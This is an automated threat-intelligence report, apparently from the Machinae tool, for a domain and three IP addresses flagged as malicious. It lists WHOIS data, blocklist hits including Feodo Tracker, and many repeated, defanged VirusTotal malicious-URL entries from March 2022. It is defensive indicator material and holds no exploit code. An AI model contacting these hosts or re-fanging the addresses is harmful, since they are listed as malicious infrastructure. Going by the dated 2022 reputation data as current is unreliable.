FIRST: – LAST: – SUBMISSIONS: 0 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS:
RESULT: 0 / 65
[!] Sample on ANY.RUN URL: https://any.run/report/a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22

Machinae results
————————-
********************************************************************************
* Information for arkpp.com
* Observable type: fqdn (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[-] No URLVoid Results
[-] No URL Unshorten Results
[-] No Malc0de Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-11-13′, ’61[.]61.127.68’)
[-] pDNS data from VirusTotal: (‘2019-11-06′, ’61[.]63.62.68’)
[-] pDNS data from VirusTotal: (‘2021-12-25′, ’91[.]195.240.87’)
[-] No McAfee Threat Results

********************************************************************************
* Information for 146.59.226.45
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] IP Whois Results
[-] ASN Information: (‘16276’, ‘146[.]59.0.0/16’, ‘1994-03-08’, ‘ripencc’, ‘FR’)
[-] Network Information: (‘146[.]59.226.0/23’, ‘VPS-GRA8’, ‘146[.]59.226.0 – 146[.]59.227.255’)
[-] Registration Info: (‘2020-10-22’, ‘2020-10-22’)
[-] Registration Locality: FR
[-] Abuse Email: abuse@ovh[.]net
[+] IPVoid Results
[-] Number of detections: 4
[-] IP Void Detection Rate: 4%
[-] Engines: (‘Feodo Tracker’, ‘(hXXps)://feodotracker[.]abuse[.]ch/’)
[-] Engines: (‘IPsum’, ‘hXXps://github[.]com/stamparm/ipsum’)
[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps)://www[.]redstout[.]com/index[.]html’)
[-] Engines: (‘Snapt NovaSense’, ‘hXXps://novasense-threats[.]com/’)
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 2
[!] Error from RansomwareTracker: 503 Server Error: Backend unavailable, connection timeout for url: https://ransomwaretracker.abuse.ch/host/146.59.226.45
[-] No SANS Results
[!] Error from freegeoip.io: 403 Client Error: Forbidden for url: https://freegeoip.io/json/146.59.226.45
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2022-03-11’, ‘vps-05aa197a.vps[.]ovh[.]net’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-09’, ‘hXXps://146[.]59.226.45/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-08’, ‘hXXp://146[.]59.226.45:443/’)
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 185.4.135.27
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] IP Whois Results
[-] ASN Information: (‘199246’, ‘185[.]4.132.0/22’, ‘2012-09-26’, ‘ripencc’, ‘GR’)
[-] Network Information: (‘185[.]4.132.0/22’, ‘GR-PAPAKI-20120926’, ‘185[.]4.132.0 – 185[.]4.135.255’)
[-] Registration Info: (‘2012-09-26’, ‘2020-07-20’)
[-] Registration Locality: GR
[-] Abuse Email: abuse@papaki[.]gr
[+] IPVoid Results
[-] Number of detections: 4
[-] IP Void Detection Rate: 4%
[-] Engines: (‘IPsum’, ‘hXXps://github[.]com/stamparm/ipsum’)
[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps)://www[.]redstout[.]com/index[.]html’)
[-] Engines: (‘S5hbl’, ‘(hXXp)://www.usenix[.]org[.]uk/content/rbl[.]html’)
[-] Engines: (‘Snapt NovaSense’, ‘hXXps://novasense-threats[.]com/’)
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2022-03-08’, ‘webmail[.]lybe[.]gr’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://185[.]4.135.27:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps://185[.]4.135.27/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-09’, ‘hXXps://185[.]4.135.27:8080/’)
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 192.99.251.50
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] IP Whois Results
[-] ASN Information: (‘16276’, ‘192[.]99.0.0/16’, ‘2013-06-17’, ‘arin’, ‘CA’)
[-] Network Information: (‘192[.]99.0.0/16’, ‘NET-192-99-0-0-1’, ‘OVH-ARIN-7’, ‘192[.]99.0.0 – 192[.]99.255.255’)
[-] Network Information: (‘192[.]99.251.48/29’, ‘NET-192-99-251-48-1’, ‘OVH-CUST-7087977’, ‘192[.]99.251.48 – 192[.]99.251.55’)
[-] Registration Info: (‘OVH Hosting, Inc.’, ‘2013-06-17’, ‘2013-06-17’)
[-] Registration Info: (‘Private Customer’, ‘2018-04-22’, ‘2018-04-22’)
[-] Registration Locality: (‘Montreal’, ‘QC’, ‘H3A 2N4’, ‘CA’)
[-] Registration Locality: (‘BENTONG’, ‘28700’, ‘MY’)
[-] Abuse Email: abuse@ovh[.]ca
[-] Tech Email: noc@ovh[.]net
[+] IPVoid Results
[-] Number of detections: 6
[-] IP Void Detection Rate: 7%
[-] Engines: (‘Barracuda_Reputation_BL’, ‘(hXXp)://www[.]barracudanetworks[.]com/’)
[-] Engines: (‘Feodo Tracker’, ‘(hXXps)://feodotracker[.]abuse[.]ch/’)
[-] Engines: (‘IPsum’, ‘hXXps://github[.]com/stamparm/ipsum’)
[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps)://www[.]redstout[.]com/index[.]html’)
[-] Engines: (‘S5hbl’, ‘(hXXp)://www.usenix[.]org[.]uk/content/rbl[.]html’)
[-] Engines: (‘Snapt NovaSense’, ‘hXXps://novasense-threats[.]com/’)
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
